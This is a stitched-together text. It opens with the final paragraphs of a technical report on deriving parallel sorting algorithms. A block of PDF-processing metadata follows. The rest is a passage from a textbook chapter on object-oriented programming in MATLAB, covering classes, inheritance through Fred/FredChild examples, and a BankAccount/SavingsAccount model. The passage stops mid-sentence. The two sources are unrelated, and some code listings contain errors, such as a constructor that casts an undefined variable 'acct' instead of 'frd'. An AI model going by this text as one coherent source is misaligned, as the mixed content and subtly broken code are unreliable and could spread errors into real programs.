alternatives is postulated, then one can show that the variant function decreases eventually, which implies that the program terminates eventually. 6. Conclusion We have presented this paper as an exercise in deriving parallel programs. First, a sequential solution to the problem is presented which is subsequently transformed into a parallel solution. Next, extra variables and communication channels are introduced. Finally, the invariant is weakened. The transformation steps are not automatic in the sense that absence of deadlock had to be proved separately. The resulting algorithms have some of the flavor of Odd-Even transposition sort. They are, however, essentially different in two respects. In every step of the loop in Odd-Even transposition sort, a process communicates with only one of its two neighbors, whereas in every step of the loop of our algorithms a process communicates with both its neighbors (as long as necessary). The other difference is that our algorithms are "smooth" (cf. [2]) in the sense that the execution time is much less for almost-sorted arrays than for hardly-sorted arrays, with a smooth transition from one to the other behavior. This is due to the conditions under which processes engage in communications. Acknowledgements We are grateful to Johan J. Lukkien for many discussions during the design of the algorithms, and to Wayne Luk for helpful remarks on the presentation. References
{"Source-Url": "http://authors.library.caltech.edu/26719/2/CS_TR_90_06.pdf", "len_cl100k_base": 9011, "olmocr-version": "0.1.53", "pdf-total-pages": 14, "total-fallback-pages": 0, "total-input-tokens": 43292, "total-output-tokens": 10171, "length": "2e13", "weborganizer": {"__label__adult": 0.0003306865692138672, "__label__art_design": 0.00028014183044433594, "__label__crime_law": 0.0004048347473144531, "__label__education_jobs": 0.0005521774291992188, "__label__entertainment": 6.22868537902832e-05, "__label__fashion_beauty": 0.00015366077423095703, "__label__finance_business": 0.00021398067474365232, "__label__food_dining": 0.00043082237243652344, "__label__games": 0.0006961822509765625, "__label__hardware": 0.001224517822265625, "__label__health": 0.0006303787231445312, "__label__history": 0.0002460479736328125, "__label__home_hobbies": 0.00012195110321044922, "__label__industrial": 0.000518798828125, "__label__literature": 0.00021970272064208984, "__label__politics": 0.00028967857360839844, "__label__religion": 0.0005235671997070312, "__label__science_tech": 0.0278167724609375, "__label__social_life": 7.18235969543457e-05, "__label__software": 0.0045928955078125, "__label__software_dev": 0.95947265625, "__label__sports_fitness": 0.0003612041473388672, "__label__transportation": 0.0005621910095214844, "__label__travel": 0.0002090930938720703}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 32751, 0.01004]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 32751, 0.52175]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 32751, 0.8874]], "google_gemma-3-12b-it_contains_pii": [[0, 173, false], [173, 2241, null], [2241, 5413, null], [5413, 7919, null], [7919, 10353, null], [10353, 11944, null], [11944, 14973, null], [14973, 17422, null], [17422, 19659, null], [19659, 22923, null], [22923, 25038, null], [25038, 27877, null], [27877, 31062, null], [31062, 32751, null]], "google_gemma-3-12b-it_is_public_document": [[0, 173, true], [173, 2241, null], [2241, 5413, null], [5413, 7919, null], [7919, 10353, null], [10353, 11944, null], [11944, 14973, null], [14973, 17422, null], [17422, 19659, null], [19659, 22923, null], [22923, 25038, null], [25038, 27877, null], [27877, 31062, null], [31062, 32751, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 32751, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 32751, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 32751, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 32751, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 32751, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 32751, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 32751, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 32751, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 32751, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 32751, null]], "pdf_page_numbers": [[0, 173, 1], [173, 2241, 2], [2241, 5413, 3], [5413, 7919, 4], [7919, 10353, 5], [10353, 11944, 6], [11944, 14973, 7], [14973, 17422, 8], [17422, 19659, 9], [19659, 22923, 10], [22923, 25038, 11], [25038, 27877, 12], [27877, 31062, 13], [31062, 32751, 14]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 32751, 0.0]]}
olmocr_science_pdfs
2024-12-09
2024-12-09
095e495539f7b8167010b99b3aeaddef4cd512f7
Chapter Objectives This chapter discusses the object-oriented paradigm, including: - Object-oriented programming (OOP) in general - How MATLAB implements OOP This chapter is not intended as a full treatment of the art and science of object-oriented design and object-oriented programming (OOP). Rather, it presents some basic definitions of terms used in OOP and the implementation in MATLAB of some simple constructs. Subsequent chapters will extend these ideas to illustrate how dynamic data structures may be constructed and manipulated using OOP. 18.1 Object-Oriented Programming In Chapters 1–17 we saw MATLAB as a means for manipulating arrays—sometimes in the guise of vectors or matrices, character strings, or cell arrays. Furthermore, the manipulation performed was conducted by writing scripts that sometimes call functions—either the functions built into MATLAB or functions we create ourselves. This type of programming is referred to as being in the procedural paradigm—functions and scripts as a form of procedure. This chapter considers a different paradigm altogether—the object-oriented (OO) paradigm. In this programming style, we still begin with a script, but the scripts that we write will usually create and interact with objects rather than arrays. 18.1.1 OO Background Languages that express the essential elements of the OO paradigm have been around since the 1960s when Simula was first developed. However, in the 1980s and 1990s, as massive software projects and especially graphical user interfaces (GUIs) became common, OO emerged as the paradigm of choice for designing and developing large software systems. Major software systems (like the various releases of Microsoft Windows) faced enormous design and integration challenges that could not be met by conventional programming practices. They needed language-imposed management of the interaction between large and small collections of programs and data. A secondary requirement in efficiently developing large software systems is the ability to reuse core software modules without rewriting their entire contents. OO principles allow core modules to be reused in three ways: - Reused intact, because the definitions of how to use them are precisely recorded - Reused and extended, adding specific custom capabilities not found in the original module, but using all of the original capabilities - Reused and redefined, replacing a few attributes of the general module by more specific definitions, while retaining all of the original characteristics The OO paradigm emerged as the framework that made large, reliable software systems possible. Note that OO encompasses far more than the syntax of any particular language, and far more than its core concepts, which are touched briefly in this section of the book. OO is primarily a design issue. OO design takes advantage of the tenets and concepts of OO languages to produce good software system designs, from which good software systems can be built. Many books are available to students wishing to pursue this subject further. However, a book on computer science concepts would be incomplete without a serious treatment of, and some practical exposure to, OO concepts. As we study OO concepts and their MATLAB implementation,\(^1\) it should be in the light of realizing the power of these concepts, and their place in the development of significant software systems. ### 18.1.2 Definitions In general, we will use the following definitions: - **A class** is the generic description of something. For example, a Toyota Prius indicates the nature of the car and the fact that one must specify a color and body style, and defines the functional relationships between, for example, the speed and fuel consumption. - **An object** is an instance of a class in the same way that one specific Toyota Prius is an instance or example of the Toyota Prius design, having a specific identification number, color and body style, and more concretely, its own values for its current location, speed, fuel contents, and so on. - **An attribute** is a data component of the class definition that will have a specific value in an object of that class at a given time. For example, all cars have a speed, but you must examine a particular car to determine its current speed. - **A method**, much like a MATLAB function, is a procedural abstraction attached to a class that enables manipulation of the attributes of a particular object. Unlike a MATLAB function, methods have access not only to their own workspace, but also to the attributes of the class of which they are a part. - **Encapsulation** is actually the core of good OO design. It is the process of packaging attributes and methods in such a way that you define and control the interfaces through which outside users (other objects) can access the attributes of your objects. - **Inheritance** is the characteristic that enables the reuse and/or extension of core facilities. It is the facility by which a general, core class can be extended to add more specific attributes and methods, perhaps redefining the behavior of a few existing methods, but retaining access to the original, unmodified behavior. - **A parent class** is the class from which other classes inherit characteristics. \(^1\) The MATLAB implementations in this text were designed to remain as close as possible to a style that permits ready translation to more conventional OO language implementations (Java, C++, or C#). Where possible, we will note typical Java implementations of the MATLAB software artifacts. Child classes are classes derived from parent classes by inheritance. Of course, grandchild classes can also inherit from child classes, and so on. Polymorphism is the ability to treat all the children of a common parent as if they were all instances of that parent. It has two important aspects, as follows: 1. All objects that are children of a parent class must be treated collectively as if they were all instances of the parent 2. Individually, the system must reach the specific child methods when called for 18.1.3 Concepts Behavioral abstraction is the central concept in OO programming. In Section 3.2.1 we discussed data abstraction as the ability to group disparate data items as arrays or structures that permit us to discuss “the temperature readings for July” or “the information about that CD” without having to enumerate all the details. In Section 5.1 we also referred to functions as implementing procedural abstraction whereby we could collect a number of recurring instructions, group them, and invoke them without reiterating all the details. Behavioral abstraction combines these two abstractions, allowing us to encapsulate not only related data items, but also the operations that are legal to perform on those data items. In the terms defined above, we can visualize a class as the encapsulation of a number of attributes with the methods that operate on those attributes to describe the behavior of an object. An abstract data type (ADT) is a technique for describing the general character of a class without descending into specifics. The format of an ADT does not have to be graphical—there are good textual techniques for accomplishing the same objective. The specific ADT format we will use in this text is shown in Figure 18.1, where the data defined for the class are enclosed in the box and the methods for operating on the data are identified by the rectangles. We will use this form to define the overall behavior of classes before diving into the detailed implementation. 18.1.4 MATLAB Observations The basic MATLAB functionality we have already used exhibits some interesting behaviors. Consider, for example, the plus operator, \( A + B \). Depending on the actual nature of \( A \) and \( B \), this might have very different effects. For example, if \( A \) is an array, its actual type (referred to in the MATLAB workspace window as its class) is \texttt{double}. MATLAB actually interprets \( A + B \) as \texttt{plus} \((A, B)\); in other words, it applies the plus method to the object \( A \) with \( B \) as the second parameter. Depending on the nature of \( B \), this operation may have very different results: - If \( A \) is \( 1 \times 1 \) (really, a scalar value), the operation will succeed when \( B \) is just about anything. - If \( A \) is any sized array, the operation will succeed only if \( B \) is either a scalar or the same size as \( A \). - Otherwise, the operation will fail with an error message. These seem to be obvious statements, but they are actually quite profound and fundamental to our understanding of OO. This means that what we have previously considered to be an “open collection” of numbers is actually a collection “protected from the world” by a set of methods that “understand” what can and cannot be done with the data (see Figure 18.2). \textbf{18.2 Categories of Classes} In general, classes fall into two categories: classes that model individual objects (physical or abstract), such as vehicles, bank accounts, or GUI widgets; and classes that model collections of things, such as arrays or queues. It is important to keep these model categories separate, but to provide for the fact that collection classes need to be able to hold objects of many different types—individual objects and other collection objects. For example, if we intended to model traffic flow in a city, we might begin by considering the city map as a collection of streets and intersections. The role of a street object is to contain and organize the vehicles moving on that street; the role of an intersection object (which might temporarily contain vehicles) is primarily to move vehicles from one street to another. Since one of the attributes of each vehicle should be the route it is currently following, the intersection should query a vehicle to discover which direction it should turn. ### 18.2.1 Modeling Physical Things We talk generically about the vehicles on the streets. In general, a vehicle would have a size, heading, location, speed, and route plan. It would have a method for moving along a street, and perhaps a generic method for drawing the vehicle when necessary. Specific vehicles would have specific constraints—motorcycles might have a higher maximum speed, for example. If we were drawing the vehicles on the streets, each specific vehicle would also have its own specific drawing method. So a vehicle class would encapsulate the basic data about a specific vehicle with methods like `draw(...)` and `move(...)`. ### 18.2.2 Modeling Collections When we look closer at the behavior of vehicles on a street (excluding passing, accidents, and so on), they behave as if they are in a queue. They join at the back of the queue, and arrive in order at the intersection at the other end of the street. So the streets really are containers of collections of vehicles with a specific behavior that we might describe as a queue. Therefore, a queue class would encapsulate objects it currently contains with methods like `enqueue(...)` and `dequeue(...)`, as shown in Figure 18.1. In a totally different application, if we were, for example, emulating a Polish notation calculator, we would need a stack to hold the intermediate values. We might visualize a stack\(^4\) class `MStack`, as shown in Figure 18.3. By convention, we refer to the process of adding data to a queue as enqueuing and the process of adding data to a stack as pushing. We refer to removing data from queues and stacks as dequeuing and popping, respectively. Finally, there are advanced processing applications that require a special kind of queue called a priority queue. Imagine, for example, a process for organizing print jobs where one does not have to wait for small print jobs to --- \(^4\) Actually, since MATLAB has a predefined stack class, we will name our stack class `MStack`. print while long print jobs are being processed. Jobs would be enqueued for printing, and small jobs would be put in the queue ahead of larger jobs. This is an example of a priority queue. ### 18.2.3 Objects within Collections A street will process each vehicle generically by traversing its queue contents, but the vehicle-specific characteristics will govern their actual behavior. In upcoming chapters we will discuss the MATLAB implementation of such a model that integrates objects with object collections; but first, we will separately consider modeling objects and collections with simple examples. #### 18.3 MATLAB Implementation MATLAB does a credible job implementing the OO language characteristics detailed in Section 18.1. Consider the very simple pair of classes shown in Figure 18.4. Both the parent class, `Fred`, and the child class, `FredChild`, contain one data item and host one method named `add`. The parent `add` method adds the value provided to its local data storage. The child `add` method adds to its own data and to the parent’s data. The following paragraphs indicate in this context how MATLAB implements the OO characteristics enumerated in Section 18.1. 18.3.1 MATLAB Classes In MATLAB a class is a collection of functions (the methods of that class) stored as M-files in a specific subdirectory of the current workspace. For example, if we were modeling the class named Fred illustrated in the figure, all of the public methods (those you want to be accessible from outside the class) must be stored in a directory named @Fred. There are two ways to withhold public access to methods. If you need a private utility for use by only one of Fred’s methods, it can be included as a local function inside that method definition file. Utilities to be shared by more than one method but not from outside the class can be stored in a subdirectory named private. MATLAB requires the following methods to be present: - A constructor named the same as the class (Fred in our example) that may contain parameters used to initialize the object and that returns the completed object. However, it must make provisions for two features: calling the constructor with no parameters and calling the constructor to copy another object of the same class—accomplished by calling the constructor with the object to copy as the only parameter. The Fred constructor is shown in Listing 18.1. - A display(...) method that is used by MATLAB whenever an assignment is made to a variable of this class without the semicolon to suppress the display. - A char(...) method that returns a string describing the content of this object. Typically, the display(...) method merely contains disp(char(...)), but this method also allows functions like fprintf(...) to display the object as a string. - set and get methods for any attributes accessible by child classes. - Other methods required by the class specification. 18.3.2 MATLAB Objects An object in MATLAB is created in a test script or a method of another class by assigning to a variable a call to the constructor of the required class with or without initializing parameters. For example, myFred = Fred would create an object myFred with default values of its attributes. Having created the object, its methods are called by invoking them by name with myFred as the first parameter. For example, to display the object, one might use the following: ```matlab fprintf('the object is %s\n', char(myFred)); ``` --- 5 Java constructors normally do not return the object—they just initialize its attributes. 6 Java enthusiasts might recognize this as toString() except that MATLAB does not automatically invoke char(...) if it is expecting a string but sees an object. 7 Most OO implementation languages use the “structure access” style for invoking methods on an object like: myFred.char(). 18.3.3 MATLAB Attributes Attributes in MATLAB are stored in a structure we will refer to as the attribute structure that actually becomes typed as the object. The structure is made into an object by casting its type in the class constructor. This is shown in Listing 18.1. In Listing 18.1: Line 1: The constructor for any class looks exactly like a function returning an object of that class. Line 2: To indicate the purpose of this particular function, we include @Fred\ in the first comment line to indicate that this constructor should be stored in that directory. Lines 3–5: Show the remainder of the documentation. Line 6: If no arguments were provided, this is the default constructor that must populate the attributes of the class with default values. Since MATLAB uses default constructors internally, this logic must always be there. Line 7: Sets the default contents of the attribute named value. Notice that at this point we have created a structure named frd. Line 8: We change the data type of the structure from struct to Fred, thereby restricting external access to the attributes of any object. Line 9: This could also be a copy constructor designed to make a copy of another object of type Fred. We detect this by checking the class of the parameter. Line 10: Since MATLAB always passes by value, the data item is already a copy of the original object, so just return that. <table> <thead> <tr> <th>Listing 18.1 Constructor for the Fred class</th> </tr> </thead> <tbody> <tr> <td>1. function frd = Fred(data)</td> </tr> <tr> <td>2. % @Fred\Fred class constructor.</td> </tr> <tr> <td>3. % frd = Fred(data) creates a Fred containing data</td> </tr> <tr> <td>4. % could also be a copy constructor:</td> </tr> <tr> <td>5. % newF = Fred(oldF) copies the old Fred oldF</td> </tr> <tr> <td>6. if nargin == 0 % did the user provide data?</td> </tr> <tr> <td>7. frd.value = 0; % set the attribute</td> </tr> <tr> <td>8. frd = class(frd,'Fred'); % cast as a Fred</td> </tr> <tr> <td>9. elseif isa(data, 'Fred') % copy constructor?</td> </tr> <tr> <td>10. frd = data;</td> </tr> <tr> <td>11. else</td> </tr> <tr> <td>12. frd.value = data; % data provided</td> </tr> <tr> <td>13. frd = class(acct,'Fred');</td> </tr> <tr> <td>14. end</td> </tr> </tbody> </table> Lines 12 and 13: This is the real constructor, which is very similar to the default constructor except the attribute is set to the data provided. 18.3.4 MATLAB Methods A method in MATLAB is written like a function, is stored in the class folder, and obeys all the normal rules of functions. The object attributes are presented to the method as its first parameter (which is actually an attribute structure). If the method changes any attributes of the object, it is necessary to return the updated attribute structure to the calling program. This is an ugly dilemma. Most conventional OOP languages implement method calls by treating the methods of a class like attributes of a structure, and allow the user to write calling code as follows: ```matlab myObject = Fred(4); myObject.add(3); ``` As a result, we would optimistically imagine that the value stored in `myObject` would be 7. However, MATLAB cannot invoke methods in this form because it has no mechanism for treating functions as attributes. Therefore, it must provide the object as a parameter (usually the first one) to a regular function call. Consequently, the above code has to be implemented as follows: ```matlab myObject = Fred(4); add(myObject, 3); ``` So we ask ourselves whether `myObject` now contains the value 7. Of course not, because the function `add(...)` received a copy of `myObject` and has no access to the original. We would be tempted to concede defeat and write the example for a third time as follows, where the function has to return an updated copy of the original object: ```matlab myObject = Fred(4); myObject = add(myObject, 3); ``` Although this last approach works, at least from the user’s perspective, it is far removed from the original concept of an object as one with persistent data. Furthermore, it takes away the ability to easily return a result from an object method. Fortunately, there is a construct in MATLAB that allows the call `add(myObject, 3)` to tunnel back to the caller’s workspace and modify the original object. In this text we have chosen the tunneling back approach shown in Listing 18.2, which illustrates the code to add something to the data stored in an object of type `Fred`. After performing the addition, the following line: ```matlab assignin('caller', inputname(1), frd) ``` is the command that tunnels back. First it obtains the name of the variable provided to this method using `inputname(1)`, and then it assigns the updated attribute structure `frd` to that name in the caller’s workspace. In Listing 18.2: Line 1: Shows the function header with an object of class Fred as the first parameter. Lines 2 and 3: Show the documentation. Line 4: Modifies the copy of the original object. Line 5: Tunnels back to the caller’s workspace, finds the variable provided as the first parameter name, and copies our new object to that variable. ### 18.3.5 Encapsulation in MATLAB Classes **Encapsulation** is accomplished in MATLAB by storing all the methods for a class in the folder named for the class (@Fred in the example). ### 18.3.6 Inheritance in MATLAB Classes **Inheritance** is sometimes referred to as an “IS-A” relationship because it defines a child class that exhibits all the behavior of the parent class as well as its own unique characteristics. It is accomplished in the MATLAB constructor for the child class. A local variable is first initialized as an instance of the parent class. The class cast method that creates the new child object includes this parent instance as a third parameter. The end result of this manipulation is an additional attribute in the child class that has the same name as the parent class and contains a reference to the parent object. When the child class needs access to the methods of the parent,\(^8\) it refers to these methods by way of this reference. Listing 18.3 shows the code for the child constructor. <table> <thead> <tr> <th>Listing 18.3 Fred child constructor</th> </tr> </thead> <tbody> <tr> <td>1. function fc = FredChild(pd, cd)</td> </tr> <tr> <td>2. % @FredChild class constructor.</td> </tr> <tr> <td>3. % fc = FredChild(pd, cd) creates a FredChild whose parent value is pd, and local attribute is cd</td> </tr> </tbody> </table> --- \(^8\) MATLAB child classes cannot directly access the attributes of the parent. They are accessed and modified only by way of the parent’s set and get methods. In Listing 18.3: Lines 1–8: Show a typical header block for this constructor. Line 9: When constructing a default child, we first construct a local parent object named `super` with default contents. Line 10: We set the child data items to default values. Line 11: We include the parent object in the class cast to establish the parent-child relationship. The actual result of including `super` is to establish another field in the `FredChild` structure named `Fred` whose content is a `Fred` object. Lines 12 and 13: Show the copy constructor. Line 15: The real constructor passes the `pd` parameter to create the parent object. Line 16: Sets the child data field. Line 17: As with the default constructor, we establish the parent-child link by passing the parent object to the class cast. ### 18.3.7 MATLAB Parent Classes A **parent class** is the class from which other classes inherit characteristics. ### 18.3.8 MATLAB Child Classes **Child classes** are derived from parent classes by inheritance. Of course, grandchild classes can also inherit from child classes. A child class cannot directly access the attribute structure of its parent. However, it can access the methods of the parent class by way of an attribute with the name of the parent class. This logic needs careful study. Examine the diagram shown in Figure 18.5, the explanatory notes, and the code for the `add` method of the child class. --- 9 Some OO languages permit child classes to inherit from more than one set of parents—a practice that can cause significant logical challenges. Other languages (Java, for one) enforce single inheritance chains, but provide alternate mechanisms (interfaces) for enforcing other common behaviors. We will see interface-like characteristics in our MATLAB code examples. shown in Listing 18.4. Note that for illustrative purposes, this method is intended to add the provided data to the attributes of both parent and child. This method might be invoked in the following code: ```matlab fc = FredChild(3, 6); add(fc, 10); ``` Figure 18.5 illustrates the sequence of creation and access for these two “simple” operations. The notes below follow the figure callouts. 1. When a script creates an object, a structure whose class name is the name of the child class appears in the workspace. Its attributes are the local data values for the child object and a special attribute with the name of the parent class. That parent class attribute contains the parent data items defined for this object. 2. When a child method is called, since the parameters are passed by value, the numerical parameters are copied in directly. 3. The original object is copied into the workspace of the child method, so the child method is working on a copy of the original object. 4. The child method can directly modify those parts of the attribute structure that belong to that child. 5. The child reaches the methods of the parent class via the attribute named for the parent class—in this case, \texttt{fch.Fred}. This attribute contains the attributes of the parent object that are defined for this child class. Because this parent structure is an attribute structure, it cannot be directly passed as a parameter to the parent’s methods. Rather, we must first extract a copy of the parent’s attribute structure. 6. We call the parent method with that copy, which modifies our local copy of the parent attributes. 7. Then, we put the copy of the parent attributes back into our local attribute structure. 8. Finally, since this method is also working with a copy of this object’s attributes, these updated attributes must be copied back to the caller. In Listing 18.4: Lines 1–4: Show a suitable header block for this method. Line 5: Adds the value to the child’s data attribute. Line 6: This line needs explanation. We really want to say the following: \begin{verbatim} add(fc.Fred, value) \end{verbatim} However, this will tunnel back to change the value of \texttt{fc.Fred}, and the addressing capability of \texttt{assignin(...)} is restricted to elementary variables; it cannot reach structure fields. So we have to extract the parent, add to it, and copy the result back to the parent. Line 7: Adds to the parent’s attribute. Line 8: Restores the local parent structure. Line 9: Copies the result back to the caller. 18.3.9 Polymorphism in MATLAB There are two crucial aspects of \textbf{polymorphism}: 1. All objects that are children of a parent class must be treated collectively as if they were all instances of the parent 2. Individually, the system must reach the specific child methods when called for. MATLAB achieves the first very naturally because it ignores the type of all data until forced to operate on that data. The power of this polymorphic approach is this: Throughout MATLAB, all data objects are self-aware—of their data type and the methods they can implement. Therefore, the second objective is achieved because when MATLAB calls a method on a particular object, it goes to the definition of that object for the method implementation. A simple example might suffice. In the Fred class, in addition to the add and constructor methods discussed, we implemented a \texttt{display(...)} method and a \texttt{char(...)} method to show the contents of objects of type Fred. In the FredChild class there is no \texttt{display(...)} method, but there is a \texttt{char(...)} method to return the contents of this child and its parent class. Listing 18.5 shows a simple test script for a child class. In Listing 18.5: Lines 1 and 2: Show the typical beginning of a script. Line 3: Shows an additional initializer to remove previous class definitions. If this is not present, for some reason MATLAB balks when you define a class you have previously defined. Line 4: Creates an instance of the parent and because the semicolon is missing, shows it by calling \texttt{display(...)} on the parent class. As shown in Listing 18.6, the \texttt{display(...)} method calls \texttt{char(...)} on this object (a parent class) that acts exactly like a \texttt{char} cast of the object, producing a character string. Line 5: Creates and displays a child object. Note that this uses the display method on the parent because the child does not have one, but calls the \texttt{char(...)} method on the child. Note also that the child \texttt{char(...)} method invokes the parent's \texttt{char(...)} method. Line 6: Changes the data in both parent and child by adding 10 to them. Line 7: Displays the child again. Listings 18.6, 18.7, and 18.8 show the parent display method and the \texttt{char} methods for the parent and child. <table> <thead> <tr> <th>Listing 18.5</th> <th>Fred child test program</th> </tr> </thead> <tbody> <tr> <td>1. clear</td> <td></td> </tr> <tr> <td>2. clc</td> <td></td> </tr> <tr> <td>3. clear classes</td> <td></td> </tr> <tr> <td>4. f = Fred(20)</td> <td></td> </tr> <tr> <td>5. fc = FredChild(3, 6)</td> <td></td> </tr> <tr> <td>6. add(fc, 10)</td> <td></td> </tr> <tr> <td>7. fc</td> <td></td> </tr> </tbody> </table> In Listing 18.6: Lines 1 and 2: Show the typical header. Line 3: Calls the \texttt{char(...)} method for whichever object is provided as a parameter, and passes the resulting string to the standard MATLAB \texttt{disp(...)} method. In Listing 18.7: Lines 1 and 2: Show the typical header. Line 3: Creates a string using \texttt{sprintf(...)}, which incorporates the parent data attribute. In Listing 18.8: Lines 1 and 2: Show the typical header. Line 3: Calls the \texttt{char(...)} method of the parent to retrieve that string, and then creates a string using \texttt{sprintf(...)}, which incorporates both child and parent data. Listing 18.9 shows the results of the script in Figure 18.5. **Listing 18.6** Parent’s \texttt{display(...)} method 1. function display(frd) 2. \% @Fred\textbackslash display method 3. disp(char(frd)) **Listing 18.7** Parent’s \texttt{char(...)} method 1. function str = char(frd) 2. \% @Fred\textbackslash char method 3. str = sprintf('Fred with \%d', frd.value); **Listing 18.8** Child’s \texttt{char(...)} method 1. function str = char(frdc) 2. \% @FredChild\textbackslash char method 3. str = ... \hspace{1em} sprintf('FredChild with \%d containing \%s', ... \hspace{1em} frdc.cdata, char(frdc.Fred) ); **Listing 18.9** Results in the Command window 1. Fred with 20 2. FredChild with 6 containing Fred with 3 3. FredChild with 16 containing Fred with 13 18.4 Example—Modeling Bank Accounts The overall goal of this section is to show a slightly more practical model than the previous illustrations without having to write too much code, and then illustrate inheritance by extension, and by redefining a small part of the code. In particular, the emphasis will be on designing and gathering functionality in the parent class in order to minimize the amount of content in the child classes. We will first see the ADT and MATLAB model for a simple bank account class, and then consider two techniques for extending that class—using extension to model a savings account, and then using redefinition to model an overdraft-protected account. 18.4.1 The Base Class Figure 18.6 illustrates the ADT for a basic BankAccount class. While there are a number of attributes of a real account associated with the identity and ownership of that account, we will keep things as simple as possible by considering just the balance on an account as the attribute of interest. The deposit and withdraw methods provide normal access to the account balance for external users. The getBalance and setBalance methods provide balance access for the derived classes. All of the following files will be stored in the folder @BankAccount except the test program, which should be in the work directory above the object directories. Listing 18.10 shows the constructor setting up the single attribute, the balance in the account. Listings 18.11, 18.12, 18.13, 18.14, 18.15, and 18.16 show the code for the methods identified in Figure 18.6 together with the standard display(...) and char(...) methods. <table> <thead> <tr> <th>Listing 18.10 BankAccount constructor</th> </tr> </thead> <tbody> <tr> <td>1. function acct = BankAccount(data)</td> </tr> <tr> <td>2. % @BankAccount\BankAccount class constructor.</td> </tr> <tr> <td>3. % ba = BankAccount(amt) creates a bank account with balance amt</td> </tr> <tr> <td>4. % could also be a copy constructor:</td> </tr> <tr> <td>5. % ba = BankAccount( oba ) copies the account oba</td> </tr> </tbody> </table> Figure 18.6 ADT for the BankAccount class In Listing 18.10: - Lines 1–6: Show the constructor header. - Lines 7–9: Show the default constructor. - Lines 12–15: Show the real constructor. In Listing 18.11: - Lines 1 and 2: Show the method header. - Line 3: Invokes the `setBalance(...)` method (Listing 18.14) to add the deposit to the current balance. - Line 4: Returns the new object with the updated balance. Access to important data like the balance of an account should go through access methods to allow for validation, writing audit trails, and so on to be added in a central location. In Listing 18.12: - Lines 1 and 2: Show the method header. - Line 3: In a typical account, withdrawals are limited to the amount in ``` if nargin == 0 acct.balance = 0; acct = class(acct,'BankAccount'); elseif isa(data, 'BankAccount') acct = data; else acct.balance = data; acct = class(acct,'BankAccount'); end ``` --- ### Listing 18.11 The `BankAccount` deposit method 1. function deposit(acct, amount) 2. "@BankAccount\deposit to the account" 3. setBalance(acct, acct.balance + amount); 4. assignin('caller', inputname(1), acct); --- ### Listing 18.12 The `BankAccount` withdraw method 1. function gets = withdraw(acct, amount) 2. "@BankAccount\withdraw from the account" 3. gets = amount; 4. if gets > acct.balance 5. gets = acct.balance; 6. end 7. setBalance(acct, acct.balance - gets); 8. assignin('caller', inputname(1), acct); the account. Consequently, we must limit the amount returned to the current balance. We initialize what the user gets to what he asked for. Lines 4–6: If this is more money than the user has, give him only the current balance. Line 7: Sets the new balance. Line 8: Updates the object. In Listing 18.13: Lines 1 and 2: Show the method header. Line 3: Shows a simple process of extracting the balance from the object. Although we do not need this method in the parent class, child classes do not have access to the parents’ attributes and therefore must use this accessor. In Listing 18.14: Lines 1 and 2: Show the method header. Line 3: Sets the balance to the given amount. Line 4: Returns the object to the caller. In Listing 18.15: Lines 1–3: Show the method header. Line 4: Invokes the char(...) method on the object provided. Every object could operate with the same display(...) method, if there were some way to accomplish this. In Listing 18.16: Lines 1–3: Show the method header. Line 4: Creates a string representing the attributes of this object. This string should be sufficiently generic to enable its use by children classes. Listing 18.17 shows a typical script to test the behavior of the BankAccount class. In Listing 18.17: Line 1: Creates a bank account with a $1,000 initial deposit. With no semicolon, the display(...) method is called to show the result. Line 2: Shows the $20.11 deposit. Although there is no semicolon, this is not an assignment and therefore no output is generated. Line 3: Shows the printout directly using the char(...) method to describe the object. Line 4: Shows the $200 withdrawal from the account. Line 5: Demonstrates that the amount was withdrawn and shows the remaining balance. Listing 18.18 shows the result from running this test script. Listing 18.16 BankAccount char method 1. function s = char(ba) 2. % @BankAccount\char for the BankAccount class 3. % returns string representation of the account 4. s = sprintf('Account with $%.2f\n', ba.balance ); Listing 18.17 BankAccount test script 1. moola = BankAccount(1000) 2. deposit(moola, 20.11) 3. fprintf('deposit 20.11 -> %s\n', char(moola) ); 4. gets = withdraw(moola, 200); 5. fprintf('withdraw 200 -> $%.2f; %s\n', ... gets, char(moola) ) Listing 18.18 Test results Account with $1000.00 deposit 20.11 -> Account with $1020.11 withdraw 200 -> $200.00; Account with $820.11 18.4.2 Inheritance by Extension Having invested significant effort in preparing the BankAccount class to be extended, writing a SavingsAccount class involves only the constructor and two methods. The SavingsAccount class will have all the characteristics of a BankAccount, plus the ability to calculate interest periodically. For simplicity, we will omit any time-sensitive calculations, and presume that the calcInterest is run only when appropriate. The interest will accumulate at a specified rate, and will be applied only if the account balance exceeds a given minimum balance. The SavingsAccount class and its parent are shown in Figure 18.7. The only new code needed will be for the constructor (Listing 18.19), the method that calculates the interest (Listing 18.20), and the char(...) method to display its content (Listing 18.21). Even that method will invoke the parent char(...) method for most of the work. All the following files except the test script must be stored in the directory @SavingsAccount. Notice the following important characteristics: - The calcInterest method does not have to specifically request the getBalance(...) method of the parent; because there is no getBalance method on this class, the parent supplies it. - Similarly, the test program merely invokes the deposit method. Since the SavingsAccount does not have one, the parent deposit method is used. - On the other hand, the char(...) method does need to invoke the parent char(...) method explicitly in order to avoid recursive behavior. - Perhaps most challenging, notice that there is no display(...) method in this class, so the parent's display(...) method is called. However, since it calls a char(...) method, we have to ask: Which char(...) method is invoked? The answer, of course, is that the SavingsAccount char(...) method is used because the object provided is a SavingsAccount first and a BankAccount second. ![Figure 18.7 The SavingsAccount class](image-url) In Listing 18.19: Lines 1–6: Show the constructor header. Line 7: Detects the need for the default constructor logic. Line 8: Creates a default parent object. Lines 9 and 10: Set the default local 